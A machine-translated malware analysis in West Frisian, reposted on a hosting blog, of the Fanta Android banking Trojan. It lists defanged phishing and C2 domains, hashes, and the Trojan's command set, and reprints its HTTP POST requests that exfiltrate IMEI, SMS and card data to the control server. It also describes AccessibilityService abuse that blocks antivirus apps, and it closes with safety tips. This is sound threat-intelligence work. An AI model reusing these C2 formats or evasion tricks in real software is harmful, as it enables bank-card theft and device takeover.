ProHoster > Blog > ynternet nijs > Leysya, Fanta: in nije taktyk foar in âlde Android Trojan

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan

Op in dei wolle jo wat ferkeapje op Avito en, nei't jo in detaillearre beskriuwing fan jo produkt pleatst hawwe (bygelyks in RAM-module), krije jo dit berjocht:

Leysya, Fanta: in nije taktyk foar in âlde Android TrojanSadree't jo de keppeling iepenje, sille jo in skynber ûnskuldige side sjen dy't jo, de lokkige en suksesfolle ferkeaper, ynformearret dat in oankeap is makke:

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
Sadree't jo op de knop "Ferdergean" klikke, sil in APK-bestân mei in ikoan en in fertrouwen-ynspirearjende namme wurde downloade nei jo Android-apparaat. Jo hawwe in applikaasje ynstalleare dy't om ien of oare reden AccessibilityService-rjochten frege, doe ferskynden in pear finsters en ferdwûnen fluch en ... Dat is it.

Jo geane om jo saldo te kontrolearjen, mar om ien of oare reden freget jo bankapplikaasje wer om jo kaartgegevens. Nei it ynfieren fan de gegevens bart der wat ferskrikliks: om ien of oare reden dy't jo noch ûndúdlik binne, begjint jild fan jo akkount te ferdwinen. Jo besykje it probleem op te lossen, mar jo tillefoan ferset: it drukt op de toetsen "Werom" en "Thús", skeakelet net út en lit jo gjin feiligensmaatregels aktivearje. As gefolch binne jo sûnder jild oerbleaun, jo guod is net kocht, jo binne betize en freegje jo ôf: wat is der bard?

It antwurd is ienfâldich: jo binne in slachtoffer wurden fan 'e Android Trojan Fanta, in lid fan' e Flexnet-famylje. Hoe kaam dit? Litte wy it no útlizze.

De auteurs: Andrey Polovinkin, junior spesjalist yn malware-analyze, Ivan Pisarev, spesjalist yn malware analyze.

Guon statistiken

De Flexnet-famylje fan Android Trojans waard earst yn 2015 bekend. Oer in frij lange perioade fan aktiviteit, de famylje útwreide nei ferskate ûndersoarten: Fanta, Limebot, Lipton, ensfh. De Trojan, lykas de dêrmei ferbûne ynfrastruktuer, steane net stil: nije effektive distribúsjeskema's wurde ûntwikkele - yn ús gefal binne phishing-siden fan hege kwaliteit rjochte op in spesifike brûker-ferkeaper, en de Trojaanske ûntwikkelders folgje modieuze trends yn firus skriuwen - it tafoegjen fan nije funksjonaliteit dy't it mooglik makket om jild effisjinter te stellen fan ynfekteare apparaten en beskermingsmeganismen omgean.

De kampanje beskreaun yn dit artikel is rjochte op brûkers út Ruslân; in lyts oantal ynfekteare apparaten waarden opnommen yn Oekraïne, en noch minder yn Kazachstan en Wyt-Ruslân.

Ek al is Flexnet no mear as 4 jier yn 'e Android Trojan-arena west en is yn detail studearre troch in protte ûndersikers, it is noch altyd yn goede foarm. Fan jannewaris 2019 ôf is it potinsjele bedrach fan skea mear dan 35 miljoen roebel - en dit is allinich foar kampanjes yn Ruslân. Yn 2015 waarden ferskate ferzjes fan dizze Android Trojan ferkocht op ûndergrûnske foarums, wêr't de boarnekoade fan 'e Trojan mei in detaillearre beskriuwing ek fûn wurde koe. Dit betsjut dat de statistiken fan skea yn 'e wrâld noch yndrukwekkender binne. Net in minne yndikator foar sa'n âld man, is it net?

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan

Fan ferkeap oant bedrog

As kin sjoen wurde út de earder presintearre skermprint fan in phishing side foar de ynternet tsjinst foar it pleatsen fan advertinsjes Avito, it waard taret foar in spesifyk slachtoffer. Blykber brûke de oanfallers ien fan Avito's parsers, dy't it tillefoannûmer en de namme fan 'e ferkeaper ekstrakt, lykas de produktbeskriuwing. Nei it útwreidzjen fan de side en it tarieden fan it APK-bestân, wurdt it slachtoffer in sms stjoerd mei syn namme en in keppeling nei in phishing-side mei in beskriuwing fan syn produkt en it bedrach ûntfongen fan 'e "ferkeap" fan it produkt. Troch op de knop te klikken, krijt de brûker in kweade APK-bestân - Fanta.

In stúdzje fan it shcet491[.]ru-domein liet sjen dat it is delegearre oan Hostinger's DNS-tsjinners:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

De domeinsône triem befettet yngongen dy't ferwize nei de IP-adressen 31.220.23[.]236, 31.220.23[.]243, en 31.220.23[.]235. It primêre boarnerecord fan it domein (A-record) wiist lykwols op in tsjinner mei IP-adres 178.132.1[.]240.

IP-adres 178.132.1[.]240 leit yn Nederlân en heart ta de hoster WorldStream. IP-adressen 31.220.23[.]235, 31.220.23[.]236 en 31.220.23[.]243 lizze yn it Feriene Keninkryk en hearre ta de dielde hostingtsjinner HOSTINGER. Wurdt brûkt as blokfluit iepenprov-ru. De folgjende domeinen binne ek oplost nei it IP-adres 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

It moat opmurken wurde dat keppelings yn it folgjende formaat beskikber wiene fan hast alle domeinen:

http://(www.){0,1}<%domain%>/[0-9]{7}

Dit sjabloan befettet ek in keppeling fan in SMS-berjocht. Op grûn fan histoaryske gegevens waard fûn dat ien domein oerienkomt mei ferskate keppelings yn it hjirboppe beskreaune patroan, wat oanjout dat ien domein brûkt waard om de Trojan te fersprieden nei ferskate slachtoffers.

Litte wy in bytsje foarút springe: de Trojan dy't fia in keppeling fan in SMS is downloade, brûkt it adres onusedseddohap[.]club. Dit domein waard registrearre op 2019-03-12, en fanôf 2019-04-29, APK-applikaasjes ynteraksje mei dit domein. Op grûn fan gegevens krigen fan VirusTotal hawwe in totaal fan 109 applikaasjes ynteraksje mei dizze tsjinner. It domein sels oplost nei it IP-adres 217.23.14[.]27, leit yn Nederlân en eigendom fan de hoster WorldStream. Wurdt brûkt as blokfluit namme goedkeap. Domeinen ek oplost nei dit IP-adres bad-racoon[.]club (begjinnend mei 2018-09-25) en bad-racoon[.]live (begjinnend mei 2018-10-25). Mei domein bad-racoon[.]club mear as 80 APK triemmen ynteraksje mei bad-racoon[.]live - mear as 100.

Yn 't algemien giet de oanfal as folget:

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan

Wat is ûnder it deksel fan Fanta?

Lykas in protte oare Android-trojans, is Fanta yn steat om SMS-berjochten te lêzen en te ferstjoeren, USSD-oanfragen te meitsjen en syn eigen finsters boppe-op applikaasjes (ynklusyf bankieren) werjaan. It arsenaal fan funksjonaliteit fan dizze famylje is lykwols oankommen: Fanta begon te brûken AccessibilityService foar ferskate doelen: it lêzen fan de ynhâld fan notifikaasjes fan oare applikaasjes, it foarkommen fan deteksje en stopjen fan de útfiering fan in Trojan op in ynfekteare apparaat, ensfh. Fanta wurket op alle ferzjes fan Android net jonger dan 4.4. Yn dit artikel sille wy it folgjende Fanta-sample fan tichterby besjen:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Fuort nei lansearring

Fuort nei lansearring ferberget de Trojan syn byldkaike. De applikaasje kin allinich wurkje as de namme fan it ynfekteare apparaat net yn 'e list stiet:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (skeermes)

Dizze kontrôle wurdt útfierd yn 'e haadtsjinst fan' e Trojan - MainService. As de earste kear lansearre, wurde de konfiguraasjeparameters fan 'e applikaasje inisjalisearre nei standertwearden (it formaat foar it bewarjen fan konfiguraasjegegevens en har betsjutting sil letter wurde besprutsen), en in nij ynfekteare apparaat wurdt registrearre op 'e kontrôletsjinner. In HTTP POST-fersyk mei it berjochttype sil nei de tsjinner stjoerd wurde register_bot en ynformaasje oer it ynfekteare apparaat (Android-ferzje, IMEI, telefoannûmer, operatornamme en lânkoade wêryn de operator is registrearre). It adres tsjinnet as de kontrôle tsjinner hXXp://onuseseddohap[.]club/controller.php. As antwurd stjoert de tsjinner in berjocht mei de fjilden bot_id, bot_pwd, tsjinner - de applikaasje bewarret dizze wearden as parameters fan 'e CnC-tsjinner. Parameter tsjinner opsjoneel as it fjild net ûntfongen is: Fanta brûkt it registraasjeadres - hXXp://onuseseddohap[.]club/controller.php. De funksje fan it feroarjen fan it CnC-adres kin brûkt wurde om twa problemen op te lossen: om de lading evenredich te ferdielen tusken ferskate servers (as d'r in grut oantal ynfekteare apparaten binne, kin de lading op in net-optimisearre webserver heech wêze), en ek te brûken in alternative tsjinner yn it gefal fan in mislearring fan ien fan 'e CnC-tsjinners.

As der in flater foarkomt by it ferstjoeren fan it fersyk, sil de Trojan it registraasjeproses nei 20 sekonden werhelje.

Sadree't it apparaat is mei súkses registrearre, Fanta sil werjaan it folgjende berjocht oan de brûker:

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
Wichtige opmerking: de tsjinst neamd Systeem feiligens - de namme fan 'e Trojaanske tsjinst, en nei it klikken op de knop OK In finster sil iepenje mei de tagonklikensynstellingen fan it ynfekteare apparaat, wêr't de brûker tagongsrjochten moat jaan foar de kweade tsjinst:

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
Sa gau as de brûker ynskeakele is AccessibilityService, Fanta krijt tagong ta de ynhâld fan applikaasjefinsters en de aksjes dy't dêryn útfierd wurde:

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
Fuort nei it ûntfangen fan tagongsrjochten freget de Trojan administratorrjochten en rjochten om notifikaasjes te lêzen:

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
Mei help fan de AccessibilityService simulearret de applikaasje toetsoanslaggen, wêrtroch himsels alle nedige rjochten jout.

Fanta makket meardere database-eksimplaren (dy't letter wurde beskreaun) nedich om konfiguraasjegegevens op te slaan, lykas ynformaasje sammele yn it proses oer it ynfekteare apparaat. Om de sammele ynformaasje te stjoeren, makket de Trojan in werhellende taak ûntworpen om fjilden fan 'e databank te downloaden en in kommando te ûntfangen fan' e kontrôletsjinner. It ynterval foar tagong ta CnC is ynsteld ôfhinklik fan 'e Android-ferzje: yn it gefal fan 5.1 sil it ynterval 10 sekonden wêze, oars 60 sekonden.

Om it kommando te ûntfangen, docht Fanta in fersyk GetTask oan de behear tsjinner. As antwurd kin CnC ien fan 'e folgjende kommando's stjoere:

team beskriuwing
0 Stjoer SMS berjocht
1 Meitsje in telefoantsje of USSD kommando
2 Updates in parameter tuskenskoft
3 Updates in parameter ûnderskieden
6 Updates in parameter smsManager
9 Begjin sms-berjochten te sammeljen
11 Weromsette jo telefoan nei fabryk ynstellings
12 It oanmeitsjen fan dialoochfinster ynskeakelje / útskeakelje

Fanta sammelet ek notifikaasjes fan 70 bankapps, snelle betellingssystemen en e-slúven en bewarret se yn in databank.

Konfiguraasjeparameters opslaan

Om konfiguraasjeparameters op te slaan, brûkt Fanta in standert oanpak foar it Android-platfoarm - Preferences-bestannen. De ynstellings wurde bewarre yn in triem mei de namme ynstellings. In beskriuwing fan de bewarre parameters is yn 'e tabel hjirûnder.

namme Standertwearde Mooglike wearden beskriuwing
id 0 Integer Bot ID
tsjinner hXXp://onuseseddohap[.]club/ URL Kontrolearje tsjinner adres
pwd - string Server wachtwurd
tuskenskoft 20 Integer Tiid ynterfal. Jout oan hoe lang de folgjende taken útsteld wurde moatte:

  • By it ferstjoeren fan in fersyk oer de status fan in ferstjoerd SMS-berjocht
  • Untfang in nij kommando fan de behearserver
ûnderskieden allegearre allegear / telNumber As it fjild is gelyk oan de tekenrige allegearre of telnûmer, dan sil it ûntfongen SMS-berjocht wurde ûnderskept troch de applikaasje en net toand oan de brûker
smsManager 0 0/1 Skeakelje de applikaasje as de standert SMS-ûntfanger yn/út
readDialog falsk Wier net wier Event logging ynskeakelje / útskeakelje TagonklikheidEvent

Fanta brûkt ek de triem smsManager:

namme Standertwearde Mooglike wearden beskriuwing
pckg - string Namme fan SMS-berjochtbehearder brûkt

Ynteraksje mei databases

Tidens syn operaasje brûkt de Trojan twa databases. Databank neamd a brûkt om ferskate ynformaasje sammele fan 'e tillefoan op te slaan. De twadde databank wurdt neamd fanta.db en wurdt brûkt om ynstellings te bewarjen dy't ferantwurdlik binne foar it meitsjen fan phishing-finsters ûntworpen om ynformaasje oer bankkaarten te sammeljen.

Trojan brûkt databank а om sammele ynformaasje op te slaan en jo aksjes oan te melden. Gegevens wurde opslein yn in tabel logs. Om in tabel te meitsjen, brûk de folgjende SQL-query:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

De databank befettet de folgjende ynformaasje:

1. It opstarten fan it ynfekteare apparaat oanmelde mei in berjocht De telefoan draaide oan!

2. Notifikaasjes fan applikaasjes. It berjocht wurdt generearre neffens it folgjende sjabloan:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bankkaartgegevens fan phishing-formulieren makke troch de Trojan. Parameter VIEW_NAME kin ien fan 'e folgjende wêze:

  • AliExpress
  • Avito
  • Google Play
  • Ferskate <%App Namme%>

It berjocht wurdt oanmeld yn it formaat:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Ynkommende/útgeande SMS-berjochten yn it formaat:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Ynformaasje oer it pakket dat it dialoochfinster makket yn it formaat:

(<%Package name%>)<%Package information%>

Foarbyld tabel logs:

Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
Ien fan 'e funksjonaliteit fan Fanta is it sammeljen fan ynformaasje oer bankkaarten. Gegevenssammeling fynt plak troch it oanmeitsjen fan phishing-finsters by it iepenjen fan bankapplikaasjes. De Trojan makket it phishing-finster mar ien kear. Ynformaasje dat it finster waard toand oan de brûker wurdt opslein yn in tabel ynstellings yn de databank fanta.db. Om in databank te meitsjen, brûk de folgjende SQL-query:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Alle tabel fjilden ynstellings standert inisjalisearre nei 1 (meitsje in phishing-finster). Neidat de brûker ynfierd harren gegevens, de wearde wurdt ynsteld op 0. Foarbyld fan tabel fjilden ynstellings:

  • can_login - it fjild is ferantwurdlik foar it werjaan fan it formulier by it iepenjen fan in bankapplikaasje
  • first_bank - net brûkt
  • can_avito - it fjild is ferantwurdlik foar it werjaan fan it formulier by it iepenjen fan de Avito-applikaasje
  • kin_ali - it fjild is ferantwurdlik foar it werjaan fan it formulier by it iepenjen fan de Aliexpress-applikaasje
  • kin_oar - it fjild is ferantwurdlik foar it werjaan fan it formulier by it iepenjen fan in applikaasje út 'e list: Yula, Pandao, Drom Auto, Wallet. Koarting- en bonuskaarten, Aviasales, Booking, Trivago
  • can_card - it fjild is ferantwurdlik foar it werjaan fan it formulier by it iepenjen Google Play

Ynteraksje mei de behear tsjinner

Netwurkynteraksje mei de behearserver komt fia it HTTP-protokol. Om mei it netwurk te wurkjen brûkt Fanta de populêre Retrofit-bibleteek. Oanfragen wurde stjoerd nei: hXXp://onuseseddohap[.]club/controller.php. It tsjinneradres kin feroare wurde by it registrearjen op de tsjinner. Koekjes kinne stjoerd wurde as antwurd fan de tsjinner. Fanta docht de folgjende oanfragen oan de tsjinner:

  • Registraasje fan 'e bot op' e kontrôletsjinner bart ien kear, by earste lansearring. De folgjende gegevens oer it ynfekteare apparaat wurde nei de tsjinner stjoerd:
    · cookie - cookies ûntfongen fan 'e tsjinner (standertwearde is in lege tekenrige)
    · wize - string konstante register_bot
    · foarheaksel - hiele getal konstante 2
    · version_sdk - wurdt foarme neffens it folgjende sjabloan: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI fan it ynfekteare apparaat
    · lân - koade fan it lân wêryn de operator is registrearre, yn ISO-formaat
    · nûmer - telefoannûmer
    · operator - operator namme

    In foarbyld fan in fersyk stjoerd nei de tsjinner:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    As antwurd op it fersyk moat de tsjinner in JSON-objekt weromjaan mei de folgjende parameters:
    · bot_id - ID fan it ynfekteare apparaat. As bot_id gelyk is oan 0, sil Fanta it fersyk opnij útfiere.
    bot_pwd - wachtwurd foar de tsjinner.
    tsjinner - kontrôle tsjinner adres. Opsjonele parameter. As de parameter net oantsjutte is, sil it adres dat is bewarre yn 'e applikaasje brûkt wurde.

    Foarbyld fan JSON-objekt:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Fersyk om in kommando te ûntfangen fan de tsjinner. De folgjende gegevens wurde nei de tsjinner stjoerd:
    · cookie - cookies ûntfongen fan 'e tsjinner
    · hjitte - id fan it ynfekteare apparaat dat waard ûntfongen by it ferstjoeren fan it fersyk register_bot
    · pwd -wachtwurd foar de tsjinner
    · divice_admin - it fjild bepaalt oft behearderrjochten krigen binne. As behearderrjochten binne krigen, is it fjild gelyk oan 1,oars 0
    · Tagonklikheid - Bedriuwstatus foar tagonklikenstsjinst. As de tsjinst is begon, is de wearde 1,oars 0
    · SMSManager - lit sjen oft de Trojan is ynskeakele as de standertapplikaasje foar it ûntfangen fan SMS
    · skerm - toant yn hokker steat it skerm is. De wearde sil ynsteld wurde 1, as it skerm oan is, oars 0;

    In foarbyld fan in fersyk stjoerd nei de tsjinner:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Ofhinklik fan it kommando kin de tsjinner in JSON-objekt weromjaan mei ferskate parameters:

    · team Stjoer SMS berjocht: De parameters befetsje it telefoannûmer, de tekst fan it SMS-berjocht en de ID fan it ferstjoerde berjocht. De identifier wurdt brûkt by it ferstjoeren fan in berjocht nei de tsjinner mei type setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · team Meitsje in telefoantsje of USSD kommando: It telefoannûmer of kommando komt yn it antwurd lichem. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · team Feroarje ynterval parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · team Feroarje intercept parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · team Feroarje SmsManager fjild. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · team Sammelje SMS-berjochten fan in ynfekteare apparaat.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · team Weromsette jo telefoan nei fabryk ynstellings: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · team Feroarje ReadDialog parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • It ferstjoeren fan in berjocht mei type setSmsStatus. Dit fersyk wurdt makke neidat it kommando is útfierd Stjoer SMS berjocht. It fersyk sjocht der sa út:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • It opladen fan databankynhâld. Ien rige wurdt ferstjoerd per fersyk. De folgjende gegevens wurde nei de tsjinner stjoerd:
    · cookie - cookies ûntfongen fan 'e tsjinner
    · wize - string konstante setSaveInboxSms
    · hjitte - id fan it ynfekteare apparaat dat waard ûntfongen by it ferstjoeren fan it fersyk register_bot
    · tekst - tekst yn it aktuele databankrecord (fjild d fan 'e tafel logs yn de databank а)
    · nûmer - namme fan it aktuele databankrecord (fjild p fan 'e tafel logs yn de databank а)
    · sms_modus - integer wearde (fjild m fan 'e tafel logs yn de databank а)

    It fersyk sjocht der sa út:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    As mei súkses ferstjoerd nei de tsjinner, de rige wurdt wiske út de tabel. Foarbyld fan in JSON-objekt weromjûn troch de tsjinner:

    {
    "response":[],
    "status":"ok"
}

Ynteraksje mei AccessibilityService

AccessibilityService waard ymplementearre om Android-apparaten makliker te meitsjen foar minsken mei in beheining. Yn 'e measte gefallen is fysike ynteraksje nedich om te ynteraksje mei in applikaasje. AccessibilityService lit jo se programmatysk dwaan. Fanta brûkt de tsjinst om falske finsters te meitsjen yn bankapplikaasjes en foar te kommen dat brûkers systeemynstellingen en guon applikaasjes iepenje.

Troch de funksjonaliteit fan 'e AccessibilityService te brûken, kontrolearret de Trojan feroaringen oan eleminten op it skerm fan it ynfekteare apparaat. Lykas earder beskreaun, befetsje de Fanta-ynstellingen in parameter dy't ferantwurdlik is foar logging operaasjes mei dialoochfinsters - readDialog. As dizze parameter ynsteld is, sil ynformaasje oer de namme en beskriuwing fan it pakket dat it barren hat oanmakke wurde tafoege oan de databank. De Trojan fiert de folgjende aksjes út as eveneminten wurde trigger:

  • Simulearret it drukken op de werom- en thústoetsen yn 'e folgjende gefallen:
    · as de brûker syn apparaat opnij opstarte wol
    · as de brûker de applikaasje "Avito" wiskje wol of tagongsrjochten wizigje
    · as d'r in fermelding is fan 'e applikaasje "Avito" op 'e side
    · by it iepenjen fan de Google Play Protect-applikaasje
    · by it iepenjen fan siden mei AccessibilityService-ynstellingen
    · as it dialoochfinster Systeemfeiligens ferskynt
    · by it iepenjen fan de side mei de ynstellings "Oare oare app tekenje".
    · by it iepenjen fan de side "Applikaasjes", "Herstel en weromsette", "Data weromsette", "Ynstellings weromsette", "ûntwikkelderspaniel", "Spesjaal. kânsen", "Spesjale kânsen", "Spesjale rjochten"
    · as it evenemint waard oanmakke troch bepaalde applikaasjes.

    List fan applikaasjes

    • android
    • Master Lite
    • Skjin master
    • Clean Master foar x86 CPU
    • Meizu Application Permission Management
    • MIUI Feiligens
    • Clean Master - Antivirus & Cache en Garbage Cleaner
    • Parental kontrôles en GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Feiligens)
    • Mobile AntiVirus Feiligens PRO
    • Avast antivirus en fergese beskerming 2019
    • Mobile Feiligens MegaFon
    • AVG-beskerming foar Xperia
    • Mobile Feiligens
    • Malwarebytes antivirus en beskerming
    • Antivirus foar Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus foar Huawei tablet Systeembehearder
    • Samsung Tagonklikheid
    • Samsung Smart Manager
    • Feiligens Master
    • Speed ​​Booster
    • Dr. Web
    • Dr.Web Feiligensromte
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Mobile Feiligens
    • Kaspersky Internet Security: Antivirus en beskerming
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - beskerming en behear
    • AVG Antivirus fergees 2019 - Beskerming foar Android
    • Antivirus Android
    • Norton Mobile Feiligens en Antivirus
    • Antivirus, firewall, VPN, mobile feiligens
    • Mobile Feiligens: antyvirus, VPN, stellerij beskerming
    • Antivirus foar Android

  • As tastimming wurdt frege by it ferstjoeren fan in SMS-berjocht nei in koart nûmer, simulearret Fanta it klikken op it karfakje Unthâld kar en knop stjoere.
  • As jo ​​​​besykje om administratorrjochten fan 'e Trojan ôf te nimmen, slút it it tillefoanskerm.
  • Foarkomt it tafoegjen fan nije behearders.
  • As de antivirus applikaasje dr.web ûntdutsen in bedriging, Fanta imitearret te drukken op de knop Negearje.
  • De Trojan simulearret it drukken op 'e werom- en thúsknop as it barren waard generearre troch de applikaasje Samsung Device Care.
  • Fanta makket phishing-finsters mei formulieren foar it ynfieren fan ynformaasje oer bankkaarten as in applikaasje út in list mei sa'n 30 ferskillende ynternettsjinsten is lansearre. Under harren: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ensfh.

    Phishing Forms

    Fanta analysearret hokker applikaasjes rinne op it ynfekteare apparaat. As in applikaasje fan belang waard iepene, toant de Trojan in phishing-finster boppe alle oaren, dat is in formulier foar it ynfieren fan bankkaartynformaasje. De brûker moat de folgjende gegevens ynfiere:

    • Kaartnûmer
    • Card ferfaldatum
    • CVV
    • Namme fan kaarthâlder (net foar alle banken)

    Ofhinklik fan 'e rinnende applikaasje sille ferskate phishing-finsters te sjen wêze. Hjirûnder binne foarbylden fan guon fan harren:

    AliExpress:

    Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
    Avito:

    Leysya, Fanta: in nije taktyk foar in âlde Android Trojan
    Foar guon oare applikaasjes, bgl. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: in nije taktyk foar in âlde Android Trojan

    Hoe't it wier wie

    Gelokkich die bliken dat de persoan dy't krige it SMS-berjocht beskreaun oan it begjin fan it artikel in cybersecurity spesjalist. Dêrom ferskilt de echte ferzje fan 'e net-regisseur fan' e earder fertelde: in persoan krige in nijsgjirrige SMS, wêrnei't hy it joech oan it Group-IB Threat Hunting Intelligence-team. It resultaat fan 'e oanfal is dit artikel. Lokkich ein, krekt? Lykwols, net alle ferhalen einigje sa súksesfol, en sadat jo net liket in regisseur besuniging mei in ferlies fan jild, yn de measte gefallen is it genôch om te hâlden oan de folgjende lang beskreaun regels:

    • Ynstallearje gjin applikaasjes foar in mobyl apparaat mei Android OS fan oare boarnen dan Google Play
    • By it ynstallearjen fan in applikaasje, betelje spesjaal omtinken foar de rjochten dy't de applikaasje freget
    • omtinken jaan oan de útwreidingen fan ynladen bestannen
    • ynstallearje Android OS updates regelmjittich
    • besykje gjin fertochte boarnen en download gjin bestannen dêrwei
    • Klikje net op keppelings ûntfongen yn SMS-berjochten.

Boarne: www.habr.com

Add a comment